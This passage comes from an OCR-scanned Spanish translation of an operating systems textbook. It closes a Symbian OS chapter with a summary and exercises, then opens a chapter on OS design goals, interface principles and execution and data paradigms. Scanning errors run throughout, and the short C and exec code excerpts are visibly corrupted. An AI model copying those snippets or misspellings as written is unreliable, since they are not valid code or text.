tocolos, es un poco más conveniente considerarlas como aplicaciones asistentes. Aquí un ejemplo 
podría ser una aplicación que utiliza IR para enviar mensajes SM S a través de un teléfono móvil. 
Esta aplicación utilizaría un módulo CSY IRCOM M en el lado de aplicación, el cual utiliza una im- 
plementación de SM S envuelta en un nivel de implementadón de protocolos. De nuevo, la modu¬ 
laridad de todo este proceso es una gran ventaja para las aplicaciones que se necesitan enfocar en 
lo que hacen mejor, y no en el proceso de comunicaciones. 


12.9 RESUMEN 

Symbian OS se diseñó como un sistema operativo orientado a objetos para las plataformas de telé¬ 
fonos inteligentes. Tiene un diseño de microkernel que utiliza un núcleo de nanokernel muy peque¬ 
ño, e implementa sólo las funciones del kernel más rápidas y primitivas. Symbian OS emplea una 
arquitectura cliente/servidor que coordina el acceso a los recursos del sistema con servidores en es¬ 
pacio de usuario. Aunque está diseñado para teléfonos inteligentes, Symbian OS tiene muchas ca¬ 
racterísticas de un sistema operativo de propósito general: procesos e hilos, administración de la 
memoria, soporte para un sistema de archivos y una infraestructura de comunicaciones extensa. 
Symbian OS implementa ciertas características únicas: por ejemplo, los objetos activos hacen mu¬ 
cho más eficiente la espera de los eventos externos, la falta de memoria virtual hace más desafian¬ 
te la administración de la memoria y el soporte a la orientación a objetos en los drivers de 
dispositivos utiliza un diseño abstracto de dos capas. 


PROBLEMAS 

1. Para cada uno de los siguientes ejemplos de servicios, describa si se debe considerar una ope¬ 
ración en espacio de kernel o en espacio de usuario (por ejemplo, en un servidor del sistema) 
para un sistema operativo de microkernel como Symbian OS: 

1. Programar un hilo para ejecutarlo 

2. Imprimir un documento 

3. Responder a una consulta de descubrimiento de Bluetooth 

4. Administrar el acceso de un hilo a la pantalla 

5. Reproducir un sonido cuando llegue un mensaje de texto 

6. Interrumpir la ejecución para responder a una llamada telefónica 
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2 . Haga una lista de tres mejoras en la eficiencia debido a un diseño de microkernel. 

3. Haga una lista de tres problemas de eficiencia debido a un diseño de microkernel. 

4. Symbian OS dividió el diseño de su kernel en dos niveles: el nanokernel y el kernel de Symbian 
OS. Los servicios como la administración dinámica de la memoria se consideraban demasiado 
complicados para el nanokernel. Describa los componentes complicados de la administración di¬ 
námica de la memoria y por qué no podrían funcionar en un nanokernel. 

5. A nalizamos los objetos activos como una forma de mejorar la eficiencia del procesamiento de 
la E/S. ¿Cree usted que una aplicación podría utilizar varios objetos activos al mismo tiempo? 
¿Cómo reaccionaría el sistema cuando varios eventos de E/S requirieran acción? 

6 . ¿La seguridad en Symbian OS se enfoca en la instalación y en que Symbian firme las aplica¬ 
ciones? ¿Podría haber un caso en el que una aplicación se colocara en almacenamiento para eje¬ 
cutarla sin ser instalada? (Sugerencia: Piense en todos los posibles puntos de entrada de datos 
para un teléfono móvil). 

7. En Symbian OS, la protección de los recursos compartidos basada en servidor se utiliza en for¬ 
ma extensa. Liste tres ventajas que tiene este tipo de coordinación de los recurso en el entorno 
de microkernel. Haga sus conjeturas en cuanto a la forma en que cada una de sus ventajas po¬ 
dría afectar a una arquitectura de kernel distinta. 
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DISEÑO DE SISTEMAS 
OPERATIVOS 


En los 12 capítulos anteriores tratamos muchos temas y analizamos gran cantidad de conceptos y 
ejemplos relacionados con los sistemas operativos. El diseño de estos presenta características espe¬ 
cíficas. En este capítulo daremos un vistazo rápido a algunas de las cuestiones y sacrificios que los 
diseñadores de sistemas operativos deben considerar al diseñar e Implementar un nuevo sistema. 

Hay cierta cantidad de folclore sobre lo que es bueno y lo que es malo en las comunidades délos 
sistemas operativos, pero es sorprendente que se haya escrito tan poco sobre ello. Tal vez el libro más 
Importante sea The Mythlcal M an M onth (El mítico hombre-mes), una obra clásica de Fred Brooksen 
la que relata sus experiencias en el diseño y la ImpIementadón del OS/360 de IB M . La edición del 20 
aniversario revisa parte de ese material y agrega cuatro nuevos capítulos (Brooks, 1995). 

Tres documentos clásicos sobre el diseño de sistemas operativos son "H Ints for Computer Sys¬ 
tem Design" (Lampson, 1984), "On Bullding SIstemsThat HUI Fall" (Corbató, 1991) y "End-to- 
End A rguments In System Design" (Saitzery colaboradores, 1984). Al Igual que el libro de Brooks, 
los tres documentos han sobrevivido el paso de los años extremadamente bien; la mayoría de sus 
Ideas siguen siendo tan válidas ahora como la primera vez que se publicaron. 

Este capítulo se basa en estas fuentes y en la experiencia personal del autor como diseñador o 
co-diseñador de tres sistemas: Amoeba (Tanenbaum y colaboradores, 1990), MINIX (Tanenbaum 
y Woodhull, 1997) y Globe (Van Steel y colaboradores, 1999a). Como no existe un consenso en¬ 
tre los diseñadores de sistemas operativos sobre la mejor forma de diseñar un sistema operativo, 
este capítulo será por lo tanto más personal, especulativo y sin duda más controversia! que los an¬ 
teriores. 
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13.1 LA NATURALEZA DEL PROBLEMA DE DISEÑO 

El diseño de sistemas operativos es más como un proyecto de ingeniería que una ciencia exacta. Es 
mucho más difícii estabiecer objetivos ciaros y cumpiirios. Vamos a empezar con estos puntos. 


13.1.1 Objetivos 

Para poder diseñar un sistema operativo exitoso, ios diseñadores deben tener una ciara idea de io que 
quieren. La taita de un objetivo dificuita de manera considerabieei proceso de tomar ias decisiones 
subsiguientes. Para aciarar más este punto, es instructivo dar un vistazo a dos ienguajes de progra¬ 
mación: PL/I y C. IBM diseñó PL/I en ia década de 1960, debido a que era una moiestia dar sopor¬ 
te tanto a FORTRAN como a COBOL, y era vergonzoso que ios académicos empezaran a pariotear 
en trasfondo queAigoi era mejor que ambos. Por io tanto, se estabieció un comité para producir un 
ienguaje que cumpiiera con ias necesidades de todas ias personas: PL/I. Tenía un poco de FOR¬ 
TRAN, un pocodeCOBOL y un pocodeAlgol. Fracasó debido a que carecía de una visión unifica- 
dora. Era tan sóio unacoiección de características en guerra unas con otras, y demasiado voiuminoso 
como para poder compiiarse con eficiencia, para iniciarse. 

A hora considerémose. Este ienguaje fue diseñado porDennis Ritchiecon un propósito: ia pro¬ 
gramación de sistemas. Fue un enorme éxito, en gran parte debido a que Ritchie sabía io que que¬ 
ría y io que no. Como resuitado, se sigue utii izando de manera extensa más de tres décadas después 
de su aparición. Tener una visión ciara de io que uno quiere es aigo imprescindibie. 

¿Qué desean ios diseñadores de sistemas operativos? Esto sin duda varía de un sistema a otro; 
de ios sistemas embebidos (incrustados) a ios sistemas de servidor. Sin embargo, para ios sistemas 
operativos de propósito generai hay que tener en cuenta cuatro puntos principaies: 

1. Definir ias abstracciones. 

2. Proveer operaciones primitivas. 

3. A segurar ei aisiamiento. 

4. Administrarei hardware. 

A continuación anaiizaremos cada uno de estos puntos. 

La tarea más importante (y tai vez ia más difícii) de un sistema operativo es definir ias abstrac¬ 
ciones correctas. Aigunas de eiias, como ios procesos, ios espacios de direcciones y ios archivos, 
han estado presentes tanto tiempo que pueden parecer obvias. Otras, como ios hiios, son más re¬ 
cientes y, en consecuencia, menos maduras. Por ejempio, si un proceso muitihiio que tiene un hiio 
bioqueado en espera de ia entrada dei teciado reaiiza una bifurcación, ¿hay un hiio en ei nuevo pro¬ 
ceso también en espera de ia entrada dei teciado? Otras abstracciones se reiacionan con ia sincro¬ 
nización, ias señaies, ei modeio de memoria, ei modeiado de ia E/S y muchas otras áreas. 
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Cada una de las abstracciones se puede instanciar en forma de estructuras de datos concretas. 
Los usuarios pueden crear procesos, archivos, semáforos, etc. Las operaciones primitivas manipu- 
ian estas estructuras de datos. Porejempio, ios usuarios pueden ieery escribir archivos. Las opera¬ 
ciones primitivas se impiementan en ia forma de iiamadas ai sistema. Desde ei punto de vista dei 
usuario, ei corazón dei sistema operativo se forma mediante ias abstracciones y ias operaciones dis- 
ponibies en eiias, a través de ias iiamadas ai sistema. 

Como varios usuarios pueden tener una sesión abierta en una computadora ai mismo tiempo, 
ei sistema operativo necesita proveer mecanismos para mantenerios separados. Un usuario no pue¬ 
de interferir con otro. Ei concepto de proceso se utiiiza ampiiamente para agrupar recursos para 
fines de protección. Por io generai también se protegen ios archivos y otras estructuras de datos. 
Asegurar que cada usuario pueda reaiizar sóio operaciones autorizadas con datos autorizados es 
un objetivo ciave dei diseño de sistemas. Sin embargo, ios usuarios también desean compartir da¬ 
tos y recursos, por io que ei aisiamiento tiene que ser seiectivo y controiado por ei usuario. Esto 
io hace más difícii inciuso. Ei programa de correo eiectrónico no debe ser capaz de hacer quefa- 
iie ei navegador Web. Inciuso cuando sóio haya un usuario, ios distintos procesos necesitan estar 
ai si ados. 

La necesidad de aisiar ias faiias está muy reiacionada con este punto. Si aiguna parte dei sis¬ 
tema faiia (io más frecuente es un proceso de usuario), no se debe permitir que faiie ei resto dei 
sistema. Ei diseño debe asegurarse de que ias diversas partes estén aisiadas unas de otras. En teo¬ 
ría, ias partes dei sistema operativo también se deben aisiar unas de otras para permitir faiias in¬ 
dependientes. 

Por úitimo, ei sistema operativo tiene que administrar ei hardware. En especiai tiene que cui¬ 
dar todos ios chips de bajo nivei, como ios controiadores de interrupciones y ei bus. También tiene 
que proporcionar un marco de trabajo para permitir que ios drivers de dispositivos administren ios 
dispositivos de E/S más grandes, como ios discos, ias impresoras o ia pantaiia. 


13.1.2 ¿Por qué es difícil diseñar un sistema operativo? 

La Ley de M oore enuncia que ei hardware de computadora mejora por un factor de 100 cada déca¬ 
da, pero no hay iey aiguna que deciare ei mejoramiento de ios sistemas operativos en un factor de 
100 cada diez años... o que siquiera mejoren. De hecho, se puede considerar que aigunos de eiios 
son peores, en ciertos sentidos ciave (como ia confiabiiidad), que ia versión 7 de UNIX, de ia dé¬ 
cada de 1970. 

¿Por qué? La mayor parte de ias veces ia inercia y ei deseo de obtener compatibiiidad inver¬ 
sa tienen ia cuipa, y también ei no poder adherirse a ios buenos principios de diseño. Pero hay más 
que eso. Los sistemas operativos son esenciaimente distintos en ciertas formas de ios pequeños 
programas de apiicación que se venden en ias tiendas por 49 (dóiares). Vamos a ver ocho de ias 
cuestiones que hacen que sea mucho más difícii diseñar un sistema operativo que un programa de 
apiicación. 

En primer iugar, ios sistemas operativos se han convertido en programas extremadamente 
extensos. Ninguna persona se puede sentar en una PC y escribir un sistema operativo serio en 
unos cuantos meses. Todas ias versiones actuaies de UNIX sobrepasan los 3 millones de líneas de 
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código. Windows Vista tiene más de 5 miiiones de iíneas de código dei kernei (y más de 70 miiio- 
nes de iíneas de código en totai). Nadie puede entender de 3 a 5 miiiones de iíneas de código, mu¬ 
cho menos 70 miiiones. Cuando tenemos un producto que ninguno de ios diseñadores puede esperar 
comprender por compieto, no debe sorprender que ios resuitados estén con frecuencia muy aieja- 
dos de io óptimo. 

Los sistemas operativos no son ios más compiejos de todos. Por ejempio, ias empresas de 
transporte aéreo son mucho más compiicadas, pero se pueden particionar en subsistemas aisiados 
para poder comprended os mejor. Las personas que diseñan ios inodoros en una aeronave no tie¬ 
nen que preocuparse por ei sistema de radar. Los dos subsistemas no tienen mucha interacción. En 
un sistema operativo, ei sistema de archivos interactúa a menudo con ei de memoria en formas 
inesperadas e imprevistas. 

En segundo iugar, ios sistemas operativos tienen que iidiar con ia concurrencia. Hay varios 
usuarios y dispositivos de E/S activos ai mismo tiempo. En esencia, es mucho más difícii adminis¬ 
trar ia concurrencia que una soia actividad secuenciai. Las condiciones de carrera y ios interbio- 
queos son sóio dos de ios probiemas que surgen. 

En tercer iugar, ios sistemas operativos tienen que iidiar con usuarios potenci ai mente hostiies 
que desean interferir con ia operación dei sistema o hacer cosas prohibidas, como robar ios archi¬ 
vos de otro usuario. EL sistema operativo necesita tomar ias medidas necesarias para evitar que es¬ 
tos usuarios se comporten de manera inapropiada. Los programas de procesamiento de paiabras y 
ios editores de fotografías no tienen este probiema. 

En cuarto iugar, a pesar dei hecho de que no todos ios usuarios desconfían de ios otros, muchos 
de eiios desean compartir parte de su información y recursos con otros usuarios seieccionados. Ei 
sistema operativo tiene que hacer esto posibie, pero de tai forma que ios usuarios maiiciosos no pue¬ 
dan interferir. De nuevo, ios programas de apiicaciones no se enfrentan a ningún reto simiiar. 

En quinto iugar, ios sistemas operativos viven por mucho tiempo. UNIX ha estado en operación 
durante un cuarto de sigio; Windows, durante más de dos décadas y no muestra signos de desapari¬ 
ción. En consecuencia, ios diseñadores tienen que pensar sobre ia forma en que pueden cambiar ei 
hardware y ias apiicaciones en un futuro distante, y cómo deben prepararse para eiio. Por io generai, 
ios sistemas que están demasiado encerrados en una visión específica dei mundo desaparecen. 

En sexto iugar, ios diseñadores de sistemas operativos en reaiidad no tienen una buena idea so¬ 
bre ia forma en que se utiiizarán sus sistemas, por io que necesitan proveer una generaiidad consi- 
derabie. Ni UNIX ni Windows se diseñaron con ei correo eiectrónico o ios navegadores Web en 
mente, y aun así hay muchas computadoras que utiiizan estos sistemas operativos y casi todo ei 
tiempo utiiizan estas dos apiicaciones. Nadie ie dice a un diseñador de barcos cómo crear uno sin 
especificarie que desean un bote de pesca, un crucero o un buque de guerra. E inciuso aigunos cam¬ 
bian de opinión después de que Íes iiega ei producto. 

En séptimo iugar, por io generai ios sistemas operativos modernos están diseñados para ser porta- 
bies, io cuai significa que deben ejecutarse en varias piataformas de hardware. También tienen que ad¬ 
mitir miies de dispositivos de E/S, y todos están diseñados de manera independiente, sin ningún tipo de 
reiación con ios demás. Un ejempio en donde esta diversidad ocasiona probiemas es ia necesidad 
de que un sistema operativo se ejecute en máquinas que utiiizan ias notaciones iittie-endian y big-en- 
dian. Un segundo ejempio se podía verde manera constante en M S-DOS, cuando ios usuarios trataban 
de instaiar, por ejempio, una tarjeta de sonido y un módem que utiiizaban ios mismos puertos de E/S 
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o las mismas líneas de petición de interrupción. Pocos programas además de los sistemas operativos 
tienen que lidiar con los problemas que ocasionan las piezas de hardware en conflicto. 

En octavo y último lugar, está la frecuente necesidad detener compatibilidad inversa con cier¬ 
to sistema operativo anterior. Ese sistema puede tener restricciones en cuanto a las longitudes de las 
palabras, los nombres de archivos u otros aspectos que los diseñadores ya consideran obsoletos pe¬ 
ro que deben seguir utilizando. Es como convertir una fábrica para producir los autos del próximo 
año en vez de los de este año, pero seguir produciendo los autos de este año a toda su capacidad. 

13.2 DISEÑO DE INTERFACES 

Para estos momentos el lector debe tener claro que no es fácil escribir un sistema operativo moder¬ 
no. Pero, ¿dónde se puede empezar? Tal vez el mejor lugar para iniciar sea pensar sobre las interfa¬ 
ces que va a proporcionar. Un sistema operativo proporciona un conjunto de abstracciones, que en 
su mayor parte se implementan mediante tipos de datos (por ejemplo, archivos) y las operaciones 
que se realizan en ellos (por ejemplo, read). En conjunto, estos dos elementos forman la interfaz 
para sus usuarios. Hay que considerar que en este contexto, los usuarios del sistema operativo son 
programadores que escriben código que utiliza llamadas al sistema, y no personas que ejecutan pro¬ 
gramas de aplicación. 

Además de la interfaz principal de llamadas al sistema, la mayoría de los sistemas operativos 
tienen interfaces adicionales. Por ejemplo, algunos programadores necesitan escribir drivers de dis¬ 
positivos para insertarlos en el sistema operativo. Estos drivers ven ciertas características y pueden 
realizar llamadas a ciertos procedimientos. Estas características y llamadas también definen una in¬ 
terfaz, pero es muy distinta de la que ven los programadores de aplicaciones. Todas estas interfaces 
se deben diseñar con cuidado, para que el sistema tenga éxito. 

13.2.1 Principios de guía 

¿Acaso hay principios que puedan guiar el diseño de las interfaces? Nosotros creemos que sí. En 
resumen son simplicidad, integridad y la habilidad de implementarse de manera eficiente. 

Principio 1: Simpiicidad 

Una interfaz simple es más fácil de comprender e implementar sin que haya errores. Todos los di¬ 
señadores de sistemas deben memorizar esta famosa cita del pionero francés aviador y escritor, A n- 
toine de St. Exupéry: 

No se llega a la perfección cuando ya no hay nada más que agregar, sino cuando ya no 
hay nada que quitar. 

Este principio dice que es mejor menos que más, por lo menos en el mismo sistema operativo. 
Otra forma de decir esto es mediante el principio KISS: Keep It Simple, Stupid (M anténganlo bre¬ 
ve y simple). 
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Principio 2: Integridad 

Desde luego que la interfaz debe permitir ai usuario hacer todo io que necesita: es decir, debe estar 
compieta. Esto nos iieva a una famosa cita deAibert Einstein: 

Todo debe ser io más simpie posibie, pero no más simpie. 

En otras paiabras, ei sistema operativo debe hacer exactamente io que se necesita de éi, y nada 
más. Si ios usuarios necesitan aimacenar datos, debe proveer cierto mecanismo para aimacenar- 
ios; si ios usuarios necesitan comunicarse unos con otros, ei sistema operativo tiene que propor¬ 
cionar un mecanismo de comunicación. En su conferencia dei Premio Turing de 1991, Francisco 
Corbató, uno de ios diseñadores de CTSS y M ULTICS, combinó ios conceptos de simpiicidad e 
integridad y dijo: 

En primer iugar, es importante enfatizar ei vaior de ia simpiicidad y ia eiegancia, ya que 
ia compiejidad tiende a agravar ias dificuitades y, como hemos visto, crear errores. M i de¬ 
finición de eiegancia es ia obtención de una funcionaiidad dada con un mínimo de meca¬ 
nismo y un máximo de ciaridad. 

La idea ciave aquí es mínimo de mecanismo. En otras paiabras, cada característica, función y ña¬ 
mada ai sistema debe iievar su propio peso. Debe hacer una soia cosa y haceria bien. Cuando un 
miembro dei equipo de diseño propone extender una ñamada ai sistema o agregar una nueva carac¬ 
terística, ios otros deben preguntar si ocurriría aigo terribieen caso de que no seinciuyera. Si ia res¬ 
puesta es: "No, pero aiguien podría encontrar esta característica útii aigún día" hay que ponería en 
una bibiioteca de nivei de usuario y no en ei sistema operativo, inciuso si es más ienta de esa for¬ 
ma. No todas ias características tienen que ser más rápidas que una baia. Ei objetivo es preservar io 
que Corbató denominó un mínimo de mecanismo. 

Ahora consideremos en forma breve dos ejempios de mi propia experiencia: M INIX (Tanen- 
baum y Woodhuii, 2006) y Amoeba (Tanenbaum y coiaboradores, 1990). Para todos ios fines y pro¬ 
pósitos, M INIX tiene tres llamadas al sistema: send, receive y sendrec. El sistema está estructurado 
como una colección de procesos donde el administrador de memoria, el sistema de archivos y cada 
driver de dispositivo son un proceso que se programa por separado. En primera instancia, todo lo 
que el kernel hacees programar procesos y manejar el paso de mensajes entre ellos. En consecuen¬ 
cia, se necesitan sólo dos ñamadas al sistema: send para enviar un mensaje y receive para recibir¬ 
lo. La tercera ñamada (sendrec) es sólo una optimización por razones de eficiencia, para permitir 
enviar un mensaje y devolver la respuesta con sólo una trampa en el kernel. Para realizar todo lo 
demás se pide a algún otro proceso (por ejemplo, el proceso del sistema de archivos o el driver de 
disco) que realice el trabajo. 

Amoeba es incluso más simple. Sólo tiene una ñamada al sistema: realizar llamada a procedi¬ 
miento remoto. Esta ñamada envía un mensajey espera una solicitud. En esencia es igual que sen¬ 
drec de M INIX. Todo lo demás está integrado en esta ñamada. 
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Principo 3: Eficiencia 

El tercer lineamiento es la eficiencia de ia impiementación. Si una característica o iiamada ai siste¬ 
ma no se puede impiementar con eficiencia, tai vez no vaiga ia pena teneria. También debe ser in¬ 
tuitivamente obvia para ei programador, en reiación con ei costo de una iiamada ai sistema. Por 
ejempio, ios programadores de UNIX esperan que la llamada al sistema iseek sea menos costosa 
que la llamada al sistema read, debido a que la primera sólo cambia un apuntador en la memoria, 
mientras que la segunda realiza operaciones de E/S de disco. Si los costos intuitivos son incorrec¬ 
tos, los programadores escribirán programas ineficientes. 


13.2.2 Paradigmas 

Una vez que se han establecido los objetivos, puede empezar el diseño. Un buen lugar para iniciar 
es pensar sobre la forma en que los clientes verán el sistema. Una de las cuestiones más importan¬ 
tes es cómo hacer que todas las características del sistema funcionen bien y presenten lo que se co¬ 
noce comúnmente como coherencia arquitectónica. En este aspecto, es importante distinguir dos 
tipos de "clientes" de los sistemas operativos. Por un lado están los usuarios, quienes interactúan 
con los programas de aplicaciones: por el otro están los programadores, quienes escriben los siste¬ 
mas operativos. Los primeros clientes tratan en su mayor parte con la GUI; los segundos tratan en 
su mayor parte con la interfaz de llamadas al sistema. Si la intención es tener una sola GUI que do¬ 
mine el sistema completo, como en la M acintosh, el diseño debe empezar ahí. Por otra parte, si la 
intención es proporcionar todas las GUIs que sea posible, como en UNIX, la interfaz de llamadas 
al sistema se debe diseñar primero. En esencia, realizar la primera GUI es un diseño de arriba ha¬ 
cia abajo. Las cuestiones son qué características tendrá, la forma en que el usuario interactuará con 
ella y cómo se debe diseñar el sistema para producirla. Por ejemplo, si la mayoría de los programas 
muestran iconos en la pantalla que esperan a que el usuario haga clic en uno de ellos, esto sugiere 
un modelo controlado por eventos para la GUI, y probablemente también para el sistema operati¬ 
vo. Por otra parte, si la mayor parte de la pantalla está llena de ventanas de texto, entonces tal vez 
sea mejor un modelo en el que los procesos lean del teclado. 

Realizar la interfaz de llamadas al sistema primero es un diseño de abajo hacia arriba. Aquí las 
cuestiones son qué tipo de características necesitan los programadores en general. En realidad no se 
necesitan muchas características especiales para proporcionar una GUI. Por ejemplo, el sistema de 
ventanasX de UNIX es sólo un programa grande en C que realiza llamadas a read y write en el te¬ 
clado, ratón y pantalla. X se desarrolló mucho después de UNIX y no se requirieron muchos cam¬ 
bios en el sistema operativo para que funcionara. Esta experiencia validó el hecho de que UNIX 
estaba bastante completo. 

Paradigmas de la interfaz de usuario 

Para la interfaz a nivel de GUI y la interfaz de llamadas al sistema, el aspecto más importante es te¬ 
ner un buen paradigma (a lo que algunas veces se le conoce como metáfora) para proveer una for- 
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ma de ver la interfaz. M uchas GUIs para los equipos de escritorio utilizan el paradigma WIM P que 
vimos en el capítulo 5. Este paradigma utiliza apuntar y hacer clic, apuntar y hacer doble clic, arras¬ 
trar y otros modismos más a lo largo de la interfaz para ofrecer una coherencia arquitectónica en to¬ 
do el sistema. A menudo, estos son requerimientos adicionales para los programas, como tener una 
barra demenúscon ARCHIVO,EDICIÓN y otras entradas, cada una de I as cual es ti ene ci ertos el e- 
mentos de menú reconocidos. De esta forma, los usuarios que conocen un programa pueden apren¬ 
der otro con rapidez. 

Sin embargo, la interfaz de usuario WIMP no es la única posible. Algunas computadoras 
de bolsillo utilizan una interfaz de escritura manual estilizada. Los dispositivos multimedia dedi¬ 
cados pueden utilizar una interfaz tipo VCR. Y por supuesto, la entrada de voz tiene un paradig¬ 
ma completamente distinto. Lo importante no es tanto el paradigma que se seleccione, sino 
el hecho de que hay un solo paradigma que invalida a los demás y unifica a toda la interfaz de 
usuario. 

Sin importar el paradigma seleccionado, es importante que todos los programas de aplica¬ 
ción lo utilicen. En consecuencia, los diseñadores de sistemas necesitan proveer bibliotecas y kits 
de herramientas para que los desarrolladores de aplicaciones tengan acceso a los procedimientos 
que producen la apariencia visual uniforme. El diseño de la interfaz de usuario es muy importan¬ 
te, pero no es el tema de este libro, por lo que ahora regresaremos al tema de la interfaz del sis¬ 
tema operativo. 


Paradigmas de ejecución 

La coherencia arquitectónica es importante a nivel de usuario, pero tiene igual importancia a ni¬ 
vel de la interfaz de llamadas al sistema. Aquí es con frecuencia útil diferenciar entre el paradig¬ 
ma de ejecución y el de datos, por lo que analizaremos ambos, empezando con el primero. 

Hay dos paradigmas de ejecución de uso extenso: algorítmicos y controlados por eventos. El 
paradigma aigorítmico se basa en la idea de que se inicia un programa para realizar cierta función 
que conoce de antemano, o que obtiene de sus parámetros. Esa función podría ser compilar un pro¬ 
grama, realizar la nómina o volar un avión a San Francisco. La lógica básica está fija en el código, 
y el programa realiza llamadas al sistema de vez en cuando para obtener datos de entrada del usua¬ 
rio, servicios del sistema operativo, etc. Este método se describe en la figura 13-l(a). 

El otro paradigma de ejecución es el paradigma controlado por eventos de la figura 13-l(b). 
Aquí el programa realiza cierto tipo de inicialización; por ejemplo, al mostrar cierta pantalla y des¬ 
pués esperar a que el sistema operativo le indique sobre el primer evento. A menudo este evento es 
la pulsación de una tecla o un movimiento del ratón. Este diseño es útil para los programas muy in¬ 
teractivos. 

Cada una de estas formas de hacer las cosas engendra su propio estilo de programación. En el 
paradigma algorítmico, los algoritmos son centrales y el sistema operativo se considera como pro¬ 
veedor de servicios. En el paradigma controlado por eventos el sistema operativo también propor¬ 
ciona servicios, pero este papel se ve eclipsado por su papel como coordinador de las actividades 
de usuario y generador de los eventos consumidos por los procesos. 
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main{) 


main{) 


int 


messj msj; 


init{); 

hacer_aigo(); 
read(...); 

hacer_algo_mas{); 
write(...); 

seguir_funcionando(); 
ex¡t(0); 


init{); 

while (obtener_mensaje(&msj)) { 
switch (msj.type) { 

case 1 
case 2:...; 
case 3:...; 


(a) 


(b) 


Figura 13-1. (a) Código algorítmico, (b) Código controlado por eventos. 

Paradigmas de datos 

El paradigma de ejecución no es el único que exporta el sistema operativo. El paradigma de datos 
es igual de importante. La pregunta clave aquí es la forma en que se presentan las estructuras y los 
dispositivos del sistema al programador. En los primeros sistemas de procesamiento por lotes de 
FORTRAN, todo se modelaba como una cinta magnética secuencial. Las pilas de tarjetas que se 
introducían se consideraban como cintas de entrada, las pilas de tarjetas que se iban a perforar 
se consideraban como cintas de salida, y la salida para la impresora se consideraba como una cin¬ 
ta de salida. Los archivos en el disco también se consideraban como cintas. Para tener acceso alea¬ 
torio a un archivo, había que rebobinar la cinta correspondiente al mismo y leerla de nuevo. 

Para realizar la asignación se utilizaban tarjetas de control de trabajos de la siguiente manera: 

MONTAR(CINTA08, CARRETE781) 

EJECUTAR(ENTRADA, MISDATOS, SALIDA, PERFORADORA, CINTA08) 

La primera tarjeta indicaba al operador que obtuviera el carrete 781 del estante de cintas y lo mon¬ 
tara en la unidad de cinta 8; la segunda indicaba al sistema operativo que ejecutara el programa 
FORTRAN que se acababa de compilar, y que asignara ENTRADA (el lector de tarjetas) a la cinta 
lógica 1, el archivo dedisco M ISDATOS a la cinta lógica 2, la impresora (llamada SALIDA) a la cin¬ 
ta lógica 3, la perforadora de tarjetas (llamada PERFORADORA) a la cinta lógica 4, y la unidad de 
cinta física 8 a la cinta lógica 5. 

FORTRAN tenía una sintaxis para leer y escribir en cintas lógicas. Al leer de la cinta lógica 1, 
el programa obtenía la entrada déla tarjeta. Al escribir en la cinta lógica 3, la salida aparecería pos¬ 
teriormente en la impresora. Al leer de la cinta lógica 5 se podía leer el carrete 781 y así en forma 
sucesiva. Flay que tener en cuenta que la idea de la cinta era sólo un paradigma para integrar el lec¬ 
tor de tarjetas, la impresora, la perforadora, los archivos de disco y las cintas. En este ejemplo, só¬ 
lo la cinta lógica 5 era una cinta física: el resto eran archivos de disco ordinarios (en cola). Era un 
paradigma primitivo, pero fue un inicio en la dirección correcta. 
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Después llegó UNIX, que utiliza en forma más avanzada el modelo de "todo es un archivo". 
M ediante el uso de este paradigma, todos los dispositivos de E/S se consideran como archivos, y se 
pueden abrir y manipular como archivos ordinarios. Las instrucciones de C 

fcl1 = open(“archivo1”, 0_RDWR); 

fcl2 = open(7clev/tty”, 0_RDWR); 

abren un verdadero archivo de disco y la terminal del usuario (teclado + pantalla). Las instruccio¬ 
nes subsecuentes pueden utilizar fdl y fd2 para leer y escribir en ellos, respectivamente. De ahí en 
adelante no hay diferencia entre acceder al archivo y a la terminal, excepto porque no se permite 
realizar búsquedas en esta última. 

UNIX no sólo unifica los archivos y los dispositivos de E/S, sino que también permite acceder 
a otros procesos como archivos mediante las tuberías. Además, cuando se admiten archivos asigna¬ 
dos, un proceso puede obtener su propia memoria virtual como si fuera un archivo. Por último, en 
las versiones de UNIX que aceptan el sistema de archivos/proc, la instrucción de C 

fdS = open(7proc/501”, 0_RDWR); 

permite al proceso (tratar de) acceder a la memoria del proceso 501 en modo de lectura y escritura 
mediante el descriptor de archivo fd3, algo que puede ser útil para un depurador, por ejemplo. 

Windows Vista va más allá y trata de hacer que todo parezca un objeto. Una vez que un proce¬ 
so adquiere un manejador válido para un archivo, proceso, semáforo, bandeja de correo u otro ob¬ 
jeto del kernel, puede realizar operaciones con él. Este paradigma es más general incluso que el de 
UNIX y mucho más general que el de FORTRAN. 

Los paradigmas unificadores ocurren también en otros contextos. Aquí vale la pena mencionar 
uno de ellos: la Web. El paradigma detrás de la Web es que el ciberespacio está lleno de documen¬ 
tos, cada uno de los cuales tiene un URL. Al escribir un URL o hacer clic en una entrada respalda¬ 
da por un URL, el usuario recibe el documento. En realidad, muchos "documentos" no son 
documentos en sí, sino que los genera un programa o una secuencia de comandos del shell cuando 
llega una petición. Por ejemplo, cuando un usuario pide a una tienda en línea una lista de CDs de 
un artista específico, un programa genera el documento al instante, pues no existía antes de realizar 
la petición. 

Ahora hemos visto cuatro casos: a saber, todo es una cinta, archivo, objeto o documento. En 
los cuatro casos, la intención es unificar los datos, dispositivos y demás recursos para facilitar su 
manejo. Cada sistema operativo debe tener un paradigma de datos unificador de ese tipo. 

13.2.3 La interfaz de llamadas al sistema 

Si uno cree en el dicho de Corbató del mecanismo mínimo, entonces el sistema operativo debe pro¬ 
porcionar la menor cantidad de llamadas al sistema con las que pueda funcionar, y cada una debe 
ser lo más simple posible (pero no más simple). U n paradigma de datos unificador puede desempe¬ 
ñar un papel importante para ayudar con esto. Por ejemplo, si los archivos, procesos, dispositivos 
de E/S y todo lo demás se ven como archivos u objetos, entonces se pueden leer mediante una 
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sola llamada al sistema read. En caso contrario, tai vez sea necesario tener iiamadas separadas pa¬ 
ra read_file, read_proc y read_tty, entre Otras. 

En aigunos casos puede parecer que ias iiamadas ai sistema necesitan variantes, pero a menu¬ 
do es mejor tener una soia iiamada ai sistema que maneje ei caso generai, con distintos procedi¬ 
mientos de bibiioteca para ocuitar este hecho de ios programadores. Porejempio, UNIX tiene una 
iiamada ai sistema para superponer un espacio de direcciones virtuaies de un proceso, exec. La iia¬ 
mada más generai es 

exec(nombre, argp, envp); 

que carga ei archivo ejecutabie nombre y ie proporciona argumentos a ios que apunta argp y varia- 
bies de entorno a ias que apunta envp. A igunas veces es conveniente iistar ios argumentos en forma 
expiícita, para que ia bibiioteca contenga procedimientos que se iiamen de ia siguiente manera: 

exec(nombre, argO, arg1, argn, 0); 

execle(nombre, argO, arg1, argn, envp); 

Todo io que hacen estos procedimientos es poner ios argumentos en un arregio y después iiamar a 
exec para que haga ei trabajo. Este arregio conjunta io mejor de ambos mundos: una soia iiamada 
